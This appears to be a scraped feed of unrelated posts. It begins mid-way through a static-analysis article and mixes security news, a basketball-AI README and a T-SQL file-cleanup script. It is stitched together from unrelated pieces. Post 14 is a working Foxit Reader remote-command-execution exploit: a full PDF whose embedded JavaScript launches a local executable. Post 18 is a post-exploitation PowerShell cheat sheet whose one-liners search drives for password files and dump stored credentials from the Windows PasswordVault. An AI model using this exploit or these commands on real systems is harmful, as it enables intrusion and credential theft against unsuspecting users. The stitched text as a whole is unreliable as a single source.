Let's take a look at the consumer of the effectiveRuleset variable, the IsStricterThan method: private static bool IsStricterThan(ReportDiagnostic action1, ReportDiagnostic action2) { switch (action2) { case ReportDiagnostic.Suppress: ....; case ReportDiagnostic.Warn: return action1 == ReportDiagnostic.Error; case ReportDiagnostic.Error: return false; default: return false; } } As you can see, it's a simple switch statement choosing between two enumerations, with ReportDiagnostic.Default as the default value. So it would be best to rewrite the call as follows: The signature of WithEffectiveAction will change: #nullable enable public RuleSet? WithEffectiveAction(ReportDiagnostic action) This is what the call will look like: RuleSet? effectiveRuleset = ruleSet.GetEffectiveRuleSet(includedRulesetPaths); effectiveRuleset = effectiveRuleset?.WithEffectiveAction(ruleSetInclude.Action); if (IsStricterThan(effectiveRuleset?.GeneralDiagnosticOption ?? ReportDiagnostic.Default, effectiveGeneralOption)) effectiveGeneralOption = effectiveRuleset.GeneralDiagnosticOption; Since IsStricterThan only performs comparison, the condition can be rewritten - for example, like this: if (effectiveRuleset == null || IsStricterThan(effectiveRuleset.GeneralDiagnosticOption, effectiveGeneralOption)) Next example. V3080 Possible null dereference. Consider inspecting 'propertySymbol'. BinderFactory.BinderFactoryVisitor.cs 372 var propertySymbol = GetPropertySymbol(parent, resultBinder); var accessor = propertySymbol.GetMethod; if ((object)accessor != null) resultBinder = new InMethodBinder(accessor, resultBinder); To fix this warning, we need to see what happens to the propertySymbol variable next. private SourcePropertySymbol GetPropertySymbol( BasePropertyDeclarationSyntax basePropertyDeclarationSyntax, Binder outerBinder) { .... NamedTypeSymbol container = GetContainerType(outerBinder, basePropertyDeclarationSyntax); if ((object)container == null) return null; .... 
return (SourcePropertySymbol)GetMemberSymbol(propertyName, basePropertyDeclarationSyntax.Span, container, SymbolKind.Property); } The GetMemberSymbol method, too, can return null under certain conditions. private Symbol GetMemberSymbol( string memberName, TextSpan memberSpan, NamedTypeSymbol container, SymbolKind kind) { foreach (Symbol sym in container.GetMembers(memberName)) { if (sym.Kind != kind) continue; if (sym.Kind == SymbolKind.Method) { .... var implementation = ((MethodSymbol)sym).PartialImplementationPart; if ((object)implementation != null) if (InSpan(implementation.Locations[0], this.syntaxTree, memberSpan)) return implementation; } else if (InSpan(sym.Locations, this.syntaxTree, memberSpan)) return sym; } return null; } With nullable reference types enabled, the call will change to this: #nullable enable SourcePropertySymbol? propertySymbol = GetPropertySymbol(parent, resultBinder); MethodSymbol? accessor = propertySymbol?.GetMethod; if ((object)accessor != null) resultBinder = new InMethodBinder(accessor, resultBinder); It's pretty easy to fix when you know where to look. Static analysis can catch this potential error with no effort by collecting all possible values of the field from all the procedure call chains. V3080 Possible null dereference. Consider inspecting 'simpleName'. CSharpCommandLineParser.cs 1556 string simpleName; simpleName = PathUtilities.RemoveExtension( PathUtilities.GetFileName(sourceFiles.FirstOrDefault().Path)); outputFileName = simpleName + outputKind.GetDefaultExtension(); if (simpleName.Length == 0 && !outputKind.IsNetModule()) .... The problem is in the line with the simpleName.Length check. The variable simpleName results from executing a long series of methods and can be assigned null. By the way, if you are curious, you could look at the RemoveExtension method to see how it's different from Path.GetFileNameWithoutExtension. 
A simpleName != null check would be enough, but with nullable reference types enabled, the code will change to something like this: #nullable enable public static string? RemoveExtension(string path) { .... } string simpleName; This is what the call might look like: simpleName = PathUtilities.RemoveExtension( PathUtilities.GetFileName(sourceFiles.FirstOrDefault().Path)) ?? String.Empty; Conclusion Nullable Reference types can be a great help when designing architecture from scratch, but reworking existing code may require a lot of time and care, as it may lead to a number of elusive bugs. This article doesn't aim to discourage you from using Nullable Reference types. We find this new feature generally useful even though the exact way it is implemented may be controversial. However, always remember the limitations of this approach and keep in mind that enabling Nullable Reference mode doesn't protect you from NREs and that, when misused, it could itself become the source of these errors. We recommend that you complement the Nullable Reference feature with a modern static analysis tool, such as PVS-Studio, that supports interprocedural analysis to protect your program from NREs. Each of these approaches - deep interprocedural analysis and annotating method signatures (which is in fact what Nullable Reference mode does) - has its pros and cons. The analyzer will provide you with a list of potentially dangerous locations and let you see the consequences of modifying existing code. If there is a null assignment somewhere, the analyzer will point at every consumer of the variable where it is dereferenced without a check. You can check this project or your own projects for other defects - just download PVS-Studio and give it a try. Source
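The conclusion's point about deep interprocedural analysis can be made concrete with a toy model. The sketch below is my own illustration, not PVS-Studio's actual algorithm: each method is reduced to a summary of what it may return, and a dereference is flagged whenever null survives the whole call chain (the GetPropertySymbol/GetMemberSymbol names echo the Roslyn example above; the summaries themselves are invented).

```python
# Toy interprocedural null tracking -- an illustrative sketch only, not how
# PVS-Studio is actually implemented. Each function is reduced to a "summary":
# the literals it may return plus the callees it may forward a result from.
def possible_returns(func_name, summaries):
    """Union of all values a function may return, following call chains."""
    values = set()
    for ret in summaries[func_name]:
        if isinstance(ret, str) and ret in summaries:  # result of another call
            values |= possible_returns(ret, summaries)
        else:
            values.add(ret)
    return values

# Invented summaries mirroring the GetPropertySymbol example above:
summaries = {
    "GetMemberSymbol": [None, "member symbol"],
    "GetPropertySymbol": [None, "GetMemberSymbol"],
}

# A dereference of GetPropertySymbol's result is flagged because None
# survives the whole call chain.
may_be_null = None in possible_returns("GetPropertySymbol", summaries)
print(may_be_null)  # True
```

This is exactly why the analyzer can point at every consumer of a variable: once null is in the set of possible values, it propagates to every call site.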
  10. © Greg Nash Officials on alert for potential cyber threats after a quiet Election Day Election officials are cautiously declaring victory after no reports of major cyber incidents on Election Day. But the long shadow of 2016, when the U.S. fell victim to extensive Russian interference, has those same officials on guard for potential attacks as key battleground states tally up remaining ballots. Agencies that have worked to bolster election security over the past years are still on high alert during the vote-counting process, noting that the election is not over even if ballots have already been cast. Election officials at all levels of government have been hyper-focused on the security of the voting process since 2016, when the nation was caught off-guard by a sweeping and sophisticated Russian interference effort that included targeting election infrastructure in all 50 states, with Russian hackers gaining access to voter registration systems in Florida and Illinois. While there was no evidence that any votes were changed or voters prevented from casting a ballot, the targeted efforts created renewed focus on the cybersecurity of voting infrastructure, along with the improving ties between the federal government and state and local election officials. In the intervening years, former DHS Secretary Jeh Johnson designated elections as critical infrastructure, and Trump signed into law legislation in 2018 creating CISA, now the main agency coordinating with state and local election officials on security issues. In advance of Election Day, CISA established a 24/7 operations center to help coordinate with state and local officials, along with social media companies, election machine vendors and other stakeholders. Hovland, who was in the operations center Tuesday, cited enhanced coordination as a key factor for securing this year's election, along with cybersecurity enhancements including sensors on infrastructure in all 50 states to sense intrusions. 
Top officials were cautiously optimistic Wednesday about how things went. Sen. Mark Warner (D-Va.), the ranking member on the Senate Intelligence Committee, said it was clear agencies including Homeland Security, the FBI and the intelligence community had "learned a ton of lessons from 2016." He cautioned that "we're almost certain to discover something we missed in the coming weeks, but at the moment it looks like these preparations were fairly effective in defending our infrastructure." A major election security issue on Capitol Hill over the past four years has focused on how to address election security threats, particularly during the COVID-19 pandemic, when election officials were presented with new challenges and funding woes. Congress has appropriated more than $800 million for states to enhance election security since 2018, along with an additional $400 million in March to address pandemic-related obstacles. But Democrats and election experts have argued the $800 million was just a fraction of what's required to fully address security threats, such as funding permanent cybersecurity professionals in every voting jurisdiction, and updating vulnerable and outdated election equipment. Threats from foreign interference have not disappeared, and threats to elections will almost certainly continue as votes are tallied, and into future elections. A senior CISA official told reporters late Tuesday night that the agency was watching for threats including disinformation, the defacement of election websites, distributed denial of service attacks on election systems and increased demand on vote reporting sites taking systems offline. With Election Day coming only weeks after Director of National Intelligence John Ratcliffe and other federal officials announced that Russia and Iran had obtained U.S. voter data and were attempting to interfere in the election process, the threats were only underlined. Via msn.com
  11. Kev

    Spam caller

    A case of not having relatives in the U.S.A.
  12. Code shack describes issue as 'moderate' security flaw, plans to disable risky commands gradually Google's bug-hunting Project Zero team has posted details of an injection vulnerability in GitHub Actions after refusing a request to postpone disclosure. The issue arises due to the ability to set environment variables that are then parsed for execution by GitHub Actions. According to the Project Zero disclosure: "As the runner process parses every line printed to STDOUT looking for workflow commands, every Github action that prints untrusted content as part of its execution is vulnerable. In most cases, the ability to set arbitrary environment variables results in remote code execution as soon as another workflow is executed." The problem was discovered in July and reported to GitHub, which issued an advisory deprecating the vulnerable commands, set-env and add-path. GitHub also posted a description of the issue which means that the information posted by Project Zero, while more detailed and including examples, is not such a big reveal. The security hole was assigned CVE-2020-15228 and rated as medium severity. It's hard to fix, as Project Zero researcher Felix Wilhelm noted: "The way workflow commands are implemented is fundamentally insecure." GitHub's solution is to gradually remove the risky commands. The trade-off is that removing the commands will break workflows that use them, but leaving them in place means the vulnerability remains, so folks will be eased off the functionality over time. The Project Zero timeline indicates some frustration with GitHub's response. Normally bug reports are published 90 days after a report is sent to the vendor, or whenever a problem is fixed, whichever is sooner, though this can be extended. On 12 October Project Zero said it told GitHub "that a grace period is available" if it needed more time to disable the vulnerable commands. The response from GitHub was to request a standard 14-day extension to 2 November. 
On 30 October, Google noted: "Due to no response and the deadline closing in, Project Zero reaches out to other informal Github contacts. The response is that the issue is considered fixed and that we are clear to go public on 2020-11-02 as planned." The implication of that statement is that the post might have been further delayed, yet when GitHub then requested an additional 48 hours "to notify customers," Project Zero said there was "no option to further extend the deadline as this is day 104 (90 days + 14 day grace extension)." Mark Penny, a security researcher at nCipher Security, said on Twitter: GitHub has not ignored the problem, but rather has taken steps towards eventually disabling the insecure feature and providing users with an alternative, so it is hard to see the benefit in disclosure other than in the general sense of putting pressure on vendors to come up with speedy fixes. November has not started well for GitHub. The second day of the month saw the site broken by an expired SSL certificate. Along with all the Twitter complaints, one user found something to be grateful for: "@github your certificate for the assets is expired today … Thanks for showing us that this can happen to everyone, small and big companies." ® Via theregister.com
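To make the underlying flaw concrete, here is a minimal Python model of the deprecated set-env workflow command. This is an illustrative sketch of the STDOUT-parsing behavior described above, not GitHub's actual runner code; the pull-request title is an invented example of untrusted content an action might print.

```python
import re

# The runner scanned every STDOUT line for workflow commands such as
# "::set-env name=VAR::value" (since deprecated). Toy parser:
SET_ENV = re.compile(r"^::set-env name=(?P<name>[^:]+)::(?P<value>.*)$")

def parse_workflow_commands(stdout_lines):
    """Collect environment variables requested via ::set-env lines."""
    env = {}
    for line in stdout_lines:
        match = SET_ENV.match(line)
        if match:
            env[match.group("name")] = match.group("value")
    return env

# A benign action echoes attacker-controlled text (e.g. a PR title)
# containing a newline, so a second line reaches the parser intact:
pr_title = "Fix typo\n::set-env name=NODE_OPTIONS::--require /tmp/evil.js"
action_output = f"Processing PR: {pr_title}".splitlines()

injected = parse_workflow_commands(action_output)
print(injected)  # {'NODE_OPTIONS': '--require /tmp/evil.js'}
```

Once an attacker controls a variable like NODE_OPTIONS, any later step that runs Node effectively executes attacker code, which is why removing the command entirely, rather than patching a parser, was the chosen fix.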
  13. This is an artificial intelligence application built on the concept of object detection. Analyze basketball shots by digging into the data collected from object detection. We can get the result by simply uploading files to the web App, or submitting a POST request to the API. Please check the features below. There are more features coming up! Feel free to follow. All the data for the shooting pose analysis is calculated by implementing OpenPose. Please note that this implementation is for noncommercial research use only. Please read the LICENSE, which is exactly the same as CMU's OpenPose License. If you are interested in the concept of human pose estimation, I have written a research paper summary of OpenPose. Check it out! Getting Started These instructions will get you a copy of the project up and running on your local machine. Get a copy Get a copy of this project by simply running the git clone command. git clone https://github.com/chonyy/AI-basketball-analysis.git Prerequisites Before running the project, we have to install all the dependencies from requirements.txt pip install -r requirements.txt Please note that you need a GPU with a proper CUDA setup to run the video analysis, since a CUDA device is required to run OpenPose. Hosting Lastly, get the project hosted on your local machine with a single command. python app.py Alternatives This project is also hosted on Heroku. However, the heavy computation of TensorFlow may cause a Timeout error and crash the app (especially for video analysis). Therefore, hosting the project on your local machine is preferable. Please note that the shooting pose analysis won't be running on the Heroku hosted website, since a CUDA device is required to run OpenPose. Project Structure Features This project has three main features: shot analysis, shot detection, and a detection API. Shot and Pose analysis Shot counting Counting shooting attempts, missed shots, and scored shots in the input video. 
Detection keypoints in different colors have different meanings, listed below: Blue: Detected basketball in normal status Purple: Undetermined shot Green: Shot went in Red: Miss Pose analysis Implementing OpenPose to calculate the angles of the elbow and knee during shooting. Release angle and release time are calculated from all the data collected from shot analysis and pose analysis. Please note that there will be a relatively big error in the release time since it was calculated as the total time the ball is in the hand. Shot detection Detection will be shown on the image. The confidence and the coordinates of the detection will be listed below. Detection API Get the JSON response by submitting a POST request to (./detection_json) with "image" as the key and the input image as the value. Detection model The object detection model is trained with the Faster R-CNN model architecture, which includes pretrained weights on the COCO dataset. I took the configuration from the model architecture and trained it on my own dataset. Future plans Host it on Azure Web App Service. Improve the efficiency, making it executable on web app services. Download: AI-basketball-analysis-master.zip or git clone https://github.com/chonyy/AI-basketball-analysis.git Source
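For reference, a call to the detection API described above might be assembled with the standard library alone. The /detection_json route and the "image" field come from this README; the host and port are my assumption for a default local run, and build_multipart/detect are hypothetical helper names, not part of the project.

```python
import json
import mimetypes
import urllib.request
import uuid

def build_multipart(field_name, filename, payload):
    """Build a multipart/form-data body with a single file field."""
    boundary = uuid.uuid4().hex
    ctype = mimetypes.guess_type(filename)[0] or "application/octet-stream"
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field_name}"; '
        f'filename="{filename}"\r\n'
        f"Content-Type: {ctype}\r\n\r\n"
    ).encode() + payload + f"\r\n--{boundary}--\r\n".encode()
    return body, f"multipart/form-data; boundary={boundary}"

def detect(image_path, url="http://127.0.0.1:5000/detection_json"):
    """Submit an image under the "image" key and return the parsed JSON.
    The URL is an assumption for a locally hosted instance (python app.py)."""
    with open(image_path, "rb") as f:
        body, content_type = build_multipart("image", image_path, f.read())
    req = urllib.request.Request(url, data=body,
                                 headers={"Content-Type": content_type})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)
```

With the third-party requests library the same call collapses to requests.post(url, files={"image": open(path, "rb")}); the manual body above just shows what actually goes over the wire.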
  14. # Exploit Title: Foxit Reader 9.7.1 - Remote Command Execution (Javascript API) # Exploit Author: Nassim Asrir # Vendor Homepage: https://www.foxitsoftware.com/ # Description: Foxit Reader before 10.0 allows Remote Command Execution via the unsafe app.opencPDFWebPage JavaScript API which allows an attacker to execute local files on the file system and bypass the security dialog. The exploit process need the user-interaction (Opening the PDF) . + Process continuation #POC %PDF-1.4 %ÓôÌá 1 0 obj << /CreationDate(D:20200821171007+02'00') /Title(Hi, Can you see me ?) /Creator(AnonymousUser) >> endobj 2 0 obj << /Type/Catalog /Pages 3 0 R /Names << /JavaScript 10 0 R >> >> endobj 3 0 obj << /Type/Pages /Count 1 /Kids[4 0 R] >> endobj 4 0 obj << /Type/Page /MediaBox[0 0 595 842] /Parent 3 0 R /Contents 5 0 R /Resources << /ProcSet [/PDF/Text/ImageB/ImageC/ImageI] /ExtGState << /GS0 6 0 R >> /Font << /F0 8 0 R >> >> /Group << /CS/DeviceRGB /S/Transparency /I false /K false >> >> endobj 5 0 obj << /Length 94 /Filter/FlateDecode >> stream xœŠ»@@EûùŠ[RØk ­x•ÄüW"DDçëœâžÜœ›b°ý“{‡éTg†¼tS)dÛ‘±=dœþ+9Ÿ_ÄifÔÈŒ [ŽãB_5!d§ZhP>¯ ‰ endstream endobj 6 0 obj << /Type/ExtGState /ca 1 >> endobj 7 0 obj << /Type/FontDescriptor /Ascent 833 /CapHeight 592 /Descent -300 /Flags 32 /FontBBox[-192 -710 702 1221] /ItalicAngle 0 /StemV 0 /XHeight 443 /FontName/CourierNew,Bold >> endobj 8 0 obj << /Type/Font /Subtype/TrueType /BaseFont/CourierNew,Bold /Encoding/WinAnsiEncoding /FontDescriptor 7 0 R /FirstChar 0 /LastChar 255 /Widths[600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 
600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600] >> endobj 9 0 obj << /S/JavaScript /JS(app.opencPDFWebPage\('C:\\\\Windows\\\\System32\\\\calc.exe'\) ) >> endobj 10 0 obj << /Names[(EmbeddedJS)9 0 R] >> endobj xref 0 11 0000000000 65535 f 0000000015 00000 n 0000000170 00000 n 0000000250 00000 n 0000000305 00000 n 0000000560 00000 n 0000000724 00000 n 0000000767 00000 n 0000000953 00000 n 0000002137 00000 n 0000002235 00000 n trailer << /ID[<7018DE6859F23E419162D213F5C4D583><7018DE6859F23E419162D213F5C4D583>] /Info 1 0 R /Root 2 0 R /Size 11 >> startxref 2283 %%EOF Source exploit-db.com
  15. In this article, I am going to show how we can automate the report of unused database files using T-SQL. Introduction Often organizations have a well-defined process to decommission the client database. I had helped one of the customers to establish the process of decommissioning the client database. Before decommissioning the client database, they wanted me to generate the backup of the customer database and detach the primary and secondary data files and transactional log files. I have created a SQL Server job to automate the entire process. In this process, there is a glitch. After decommissioning the database, the data files and log files are left unattended. Due to that, the disk drives start getting full. To fix this issue, we decided to create another SQL Job to generate the list of the unused database files and log files and email them to the stakeholders. They verify the list of files and provide the approval to delete the files. I had created a stored procedure to identify the list of database files and log files that are not attached to any database, display the output in an HTML formatted table, and email it using the database mail. The script performs the following tasks: Define temp tables to save the list of the drives and database files Use xp_fixeddrives to save the drive letter and free space in the #tbldrive table Use the dir command to get the list of all database files and store them in the #tblFiles table Compare the list of the files to the output of sys.master_files to get the physical files that are not in the database Create temp tables First, let us create a temp table named #tbldrive to save the list of the drives and free space in the drive and #tblFiles to insert the list of the physical locations of files that have *.mdf, *.ndf, or *.ldf extensions. 
Following is the T-SQL query to create the tables: create table #tbldrive (ID INT IDENTITY(1,1), [DriveLetter] VARCHAR(1), [Free_Space] INT) Go create table #tblFiles (ID INT IDENTITY(1,1), [FilePath] NVARCHAR(max)) Go Insert drive letter details in temp table Run the following T-SQL query to insert the list of drives and free space in the #tbldrive table. INSERT INTO #tbldrive ([DriveLetter], [Free_Space]) EXEC xp_fixeddrives; Insert list of files in temp table To insert the list of the physical locations of files in the temp table, we must create a dynamic T-SQL query that uses the drive letters stored in #tbldrive and create a dir command. In the dir command, we are going to use the /S /B flags. The /S /B flags return the full path of the files with *.mdf and *.ldf extensions. The following code generates the dir command. DECLARE @DriveLetter NVARCHAR(1); DECLARE @DriveCommand NVARCHAR(4000); DECLARE @i INT; SET @i = 1; WHILE ISNULL(@i, 0) > 0 BEGIN --get next available drive SET @DriveLetter = (SELECT [DriveLetter] FROM #tbldrive WHERE ID = @i); --create the command to get directory information SET @DriveCommand = N'dir ' + @DriveLetter + ':\*.*df /S/B'; --get directory information for the current drive select @DriveCommand SET @i = (SELECT [ID] + 1 FROM #tbldrive WHERE ID = @i); IF @i IS NULL SET @i = 0; END; Command Output: Now, as mentioned, we will insert the output of the command in #tblFiles. To do that, add the following T-SQL query block in the while loop. 
INSERT INTO #tblFiles ([FilePath]) EXEC xp_cmdshell @DriveCommand; The entire code block is as follows: set nocount on; DECLARE @DriveLetter NVARCHAR(1); DECLARE @DriveCommand NVARCHAR(4000); DECLARE @i INT; SET @i = 1; WHILE ISNULL(@i, 0) > 0 BEGIN --get next available drive SET @DriveLetter = (SELECT [DriveLetter] FROM #tbldrive WHERE ID = @i); --create the command to get directory information SET @DriveCommand = N'dir ' + @DriveLetter + ':\*.*df /S/B'; --get directory information for the current drive INSERT INTO #tblFiles ([FilePath]) EXEC xp_cmdshell @DriveCommand; SET @i = (SELECT [ID] + 1 FROM #tbldrive WHERE ID = @i); IF @i IS NULL SET @i = 0; END; select FilePath from #tblFiles drop table #tbldrive drop table #tblFiles The output listing the physical locations of the mdf and ldf files is the following: Compare the list with the output of sys.master_files Now, we will compare the list of the physical locations in #tblFiles with the list of the values of the physical_name column in the sys.master_files DMV. Following is the code: select FilePath from #tblFiles where FilePath not in (select physical_name from sys.master_files) and FilePath not like 'C:\%' and (FilePath like '%mdf' OR FilePath like '%ndf' OR FilePath like '%ldf' ) The output is the following: Now, to display the output in email, we will use HTML code. The HTML code for the table will be stored in the @UnusedDatabaseFiles variable. The data type of the variable is nvarchar(max). 
Following is the code: DECLARE @UnusedDatabaseFiles NVARCHAR(MAX); SET @UnusedDatabaseFiles = '<table id="AutoNumber1" style="BORDER-COLLAPSE: collapse" borderColor="#111111" height="40" cellSpacing="0" cellPadding="0" width="50%" border="1"> <tr> <td width="27%" bgColor="#D3D3D3" height="15"><b> <font face="Verdana" size="1" color="#FFFFFF">Database Files </font></b></td> </tr> <p style="margin-top: 1; margin-bottom: 0">&nbsp;</p> <p><font face="Verdana" size="4">List of unused database files</font></p>' SELECT @UnusedDatabaseFiles = @UnusedDatabaseFiles + '<tr><td><font face="Verdana" size="1">' + CONVERT(VARCHAR, filepath) + '</font></td></tr>' FROM #tblfiles WHERE filepath NOT IN (SELECT physical_name FROM sys.master_files) AND filepath NOT LIKE 'C:\%' AND ( filepath LIKE '%mdf' OR filepath LIKE '%ndf' OR filepath LIKE '%ldf' ) To send the email, we will use the SQL Server database mail. I have already created a database mail profile named OutlookMail. The code to email the list of unused database files is as follows: EXEC msdb.dbo.sp_send_dbmail @profile_name = 'OutlookMail', @recipients='n******87@outlook.com', @subject = 'List of unused database files', @body = @UnusedDatabaseFiles, @body_format = 'HTML' ; Create a SQL Server Agent Job Once the stored procedure is created, we will use a SQL Server Agent job to automate it. For that, open SQL Server Management Studio, expand the SQL Server instance, expand SQL Server Agent, right-click on Jobs, and select New Job. On the New Job dialog box, provide the desired name of the SQL job in the Job Name text box. Click on Steps and click on New to create a job step. In the New Job Step dialog box, choose Transact-SQL from the Type drop-down box and enter the following T-SQL code in the command textbox. Use DBA GO Exec sp_getunuseddatabases Click OK to save the step and close the dialog box. We will schedule the execution of this job every week on Monday at 9:00 AM; therefore, configure the schedule accordingly. To do that, click on Schedules in the New Job dialog box. 
On the New Schedule dialog box, enter the desired schedule name in the Name textbox, choose Weekly from the Occurs drop-down box, check the Monday checkbox, and enter 09:00:00 in the Occurs once at textbox. See the following screenshot. Click OK to save the schedule and close the New Job Schedule dialog box. Click OK to save the SQL Job. Now let us test the SQL job. To do that, right-click on the SQL job and click Start Job at Step. Once the job completes execution, you will receive the email, as shown below. Summary In this article, I have shown a T-SQL script used to generate a list of unused database data files and log files. Moreover, I have also explained how we can display the list of the files in an HTML formatted table and automate the report using a SQL Server Agent job. Source sqlshack.com
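Stripped of the T-SQL plumbing, the report in this article boils down to a set difference: every data/log file found on disk minus everything sys.master_files knows about. The same core check can be sketched in Python (an illustration only; unused_database_files is a hypothetical helper, and on a real server the attached list would come from querying sys.master_files):

```python
from pathlib import Path

# SQL Server data/log file extensions matched by the article's dir filter
DB_EXTENSIONS = {".mdf", ".ndf", ".ldf"}

def unused_database_files(search_root, attached_files):
    """Return files under search_root with database extensions that are
    not in the attached list (the stand-in for sys.master_files)."""
    attached = {Path(p).resolve() for p in attached_files}
    return sorted(
        str(p)
        for p in Path(search_root).rglob("*")
        if p.suffix.lower() in DB_EXTENSIONS and p.resolve() not in attached
    )
```

The T-SQL version additionally skips the C:\ drive; here that is just a matter of choosing search_root.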
  16. https://www.ekscaffolddesign.com/2D-SCAFFOLD-DESIGN-DRAWINGS-AND-CALCULATIONS.html
  17. NATO Secretary General Jens Stoltenberg addresses the Munich Security Conference in 2015. (NATO / Flickr) Iranian government-linked hackers have been sending spearphishing emails to large swaths of high-profile potential attendees of the upcoming Munich Security Conference as well as the Think 20 Summit in Saudi Arabia, according to Microsoft research. The Iranian attackers, known as Phosphorous, have disguised themselves as conference organizers and have sent fake invitations containing PDF documents with malicious links to over 100 possible invitees of the conferences, both of which are prominent summits dedicated to international security and policies of the world's largest economies, respectively. In some cases the attackers have been successful in guiding victims to those links, which lead to credential-harvesting pages, Tom Burt, corporate vice president of Microsoft Security and Trust, announced in a blog published Wednesday morning. Microsoft did not say what information, if any, the attackers successfully stole from victims. It was just the latest example of Phosphorous targeting non-governmental entities — the group has been known to target journalists and researchers who focus on Iran in the past, for instance. The hackers typically also go after entities in the military, energy, business services, and telecommunications sectors throughout the U.S. and the Middle East, according to previous FireEye research. The Iranian government-linked hackers tend to conduct long-term strategic intelligence gathering, according to FireEye. Although Microsoft is releasing the information on the threat to Munich Security Conference attendees in close proximity to the U.S. presidential elections, Microsoft researchers do not believe this specific campaign is linked with the election. 
But the same hackers behind this operation, also known as APT35 or Charming Kitten, have targeted associates of President Donald Trump’s reelection campaign before, according to previous Microsoft and Google research. In recent months the hackers have targeted the Trump campaign, according to research Microsoft published last month and Google research published in June. The same group was targeting journalists and the email accounts of people associated with the Trump campaign one year ago as well. Via cyberscoop.com
  18. This article contains a list of PowerShell commands collected from various corners of the Internet which could be helpful during penetration tests or red team exercises. The list includes various post-exploitation one-liners in pure PowerShell without requiring any offensive (= potentially flagged as malicious) 3rd party modules, but also a bunch of handy administrative commands. Let's get to it! Table Of Contents Locating files with sensitive information Find potentially interesting files Find credentials in Sysprep or Unattend files Find configuration files containing "password" string Find database credentials in configuration files Locate web server configuration files Extracting credentials Get stored passwords from Windows PasswordVault Get stored passwords from Windows Credential Manager Dump passwords from Google Chrome browser Get stored Wi-Fi passwords from Wireless Profiles Search for SNMP community string in registry Search for string pattern in registry Privilege escalation Search registry for auto-logon credentials Check if AlwaysInstallElevated is enabled Find unquoted service paths Check for LSASS WDigest caching Credentials in SYSVOL and Group Policy Preferences (GPP) Network related commands Set MAC address from command-line Allow Remote Desktop connections Host discovery using mass DNS reverse lookup Port scan a host for interesting ports Port scan a network for a single port (port-sweep) Create a guest SMB shared drive Whitelist an IP address in Windows firewall Other useful commands File-less download and execute Get SID of the current user Check if we are running with elevated (admin) privileges Disable PowerShell command logging List installed antivirus (AV) products Conclusion Locating files with sensitive information The following PowerShell commands can be handy during the post-exploitation phase for locating files on disk that may contain credentials, configuration details and other sensitive information. 
Find potentially interesting files With this command we can identify files with potentially sensitive data such as account information, credentials, configuration files etc. based on their filename: gci c:\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -EA SilentlyContinue Although this can produce a lot of noise, it can also yield some very interesting results. Recommended to do this for every disk drive, but you can also just run it on the c:\users folder for some quick wins. Find credentials in Sysprep or Unattend files This command will look for remnants from automated installation and auto-configuration, which could potentially contain plaintext passwords or base64 encoded passwords: gci c:\ -Include *sysprep.inf,*sysprep.xml,*sysprep.txt,*unattended.xml,*unattend.xml,*unattend.txt -File -Recurse -EA SilentlyContinue This is one of the well known privilege escalation techniques, as the password is typically the local administrator password. Recommended to do this for every disk drive. Find configuration files containing “password” string With this command we can locate files containing a certain pattern, e.g. here we are looking for a “password” pattern in various textual configuration files: gci c:\ -Include *.txt,*.xml,*.config,*.conf,*.cfg,*.ini -File -Recurse -EA SilentlyContinue | Select-String -Pattern "password" Although this can produce a lot of noise, it could also yield some interesting results. Recommended to do this for every disk drive. Find database credentials in configuration files Using the following PowerShell command we can find database connection strings (with plaintext credentials) stored in various configuration files such as web.config for ASP.NET configuration, in Visual Studio project files etc.: gci c:\ -Include *.config,*.conf,*.xml -File -Recurse -EA SilentlyContinue | Select-String -Pattern "connectionString" Finding connection strings e.g. 
for a remote Microsoft SQL Server could lead to a Remote Command Execution (RCE) using the xp_cmdshell functionality (link, link, link etc.) and consequent lateral movement. Locate web server configuration files With this command, we can easily find configuration files belonging to a Microsoft IIS, XAMPP, Apache, PHP or MySQL installation: gci c:\ -Include web.config,applicationHost.config,php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -EA SilentlyContinue These files may contain plain text passwords or other interesting information which could allow accessing other resources such as databases, administrative interfaces etc. Extracting credentials The following PowerShell commands also fall under the post-exploitation category and they can be useful for extracting credentials after gaining access to a Windows system. Get stored passwords from Windows PasswordVault Using the following PowerShell command we can extract secrets from the Windows PasswordVault, which is a Windows built-in mechanism for storing passwords and web credentials e.g. for Internet Explorer, Edge and other applications: [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $_.RetrievePassword();$_ } Note that the vault is typically stored in the following locations and it is only possible to retrieve the secrets under the context of the currently logged-in user: C:\Users\<USERNAME>\AppData\Local\Microsoft\Vault\ C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault\ C:\ProgramData\Microsoft\Vault\ More information about Windows PasswordVault can be found here. 
